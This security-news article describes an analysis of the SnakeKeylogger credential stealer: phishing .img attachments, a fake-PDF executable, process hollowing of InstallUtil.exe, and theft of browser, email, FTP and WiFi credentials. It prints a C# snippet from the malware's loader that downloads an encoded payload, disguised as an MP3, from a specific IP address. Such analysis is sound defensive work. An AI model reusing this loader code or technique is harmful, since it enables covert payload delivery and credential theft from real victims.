SnakeKeylogger has emerged as a sophisticated credential-stealing malware, targeting both individuals and organizations with its multi-stage infection chain and stealthy in-memory execution techniques.
This malware is specifically designed to harvest sensitive login credentials while remaining undetected by traditional security measures, making it particularly dangerous in today’s digital landscape.
The initial infection vector is a malicious spam email containing a disk image (.img) file attachment. When opened, this file creates a virtual drive containing an executable that masquerades as a PDF document.
The disguised executable’s icon and name are carefully chosen to resemble important business documents, increasing the likelihood that recipients will open it without suspicion.
What makes SnakeKeylogger particularly concerning is its systematic approach to data harvesting.
The malware targets credentials stored in web browsers, email clients, FTP applications, and even extracts WiFi passwords from infected systems.
Once collected, this sensitive information is exfiltrated to attacker-controlled servers.
Seqrite researchers identified that SnakeKeylogger employs a sophisticated multi-stage infection technique to enhance its stealth capabilities.
Attack Chain
Their analysis revealed the malware’s ability to download encrypted payloads and execute them directly in memory, avoiding disk-based detection methods.
The infection chain begins with the Stage1 loader connecting to a remote server to fetch what appears to be an MP3 file but is actually an encoded payload.
.png)
A key section of the malware’s code reveals this deception:-
private static byte[] Goakadr()
{
using (HttpClient httpClient = new HttpClient())
{
Stream result = httpClient.GetStreamAsync(new Uri("http://103.72.56.30/PHANTOM/Xawnb.mp3")).Result;
using (MemoryStream memoryStream = new MemoryStream())
{
result.CopyTo(memoryStream);
array = memoryStream.ToArray();
}
}
}This initial payload is then decrypted (Stage2) and injected into legitimate Windows processes through a technique known as process hollowing.
The malware specifically targets InstallUtil.exe, a legitimate .NET Framework utility, hollowing out its memory and replacing it with malicious code. By executing within a trusted Windows process, SnakeKeylogger can more effectively evade security solutions.
The injected code then begins systematically harvesting credentials from over 30 different web browsers, email clients like Outlook and Thunderbird, FTP applications like FileZilla, and instant messaging platforms.
.png)
The above image shows the extensive list of browser targets, including not only major browsers but also regional and less common variants, demonstrating the thoroughness of the attackers’ approach.
Investigate Real-World Malicious Links & Phishing Attacks With Threat Intelligence Lookup - Try for Free
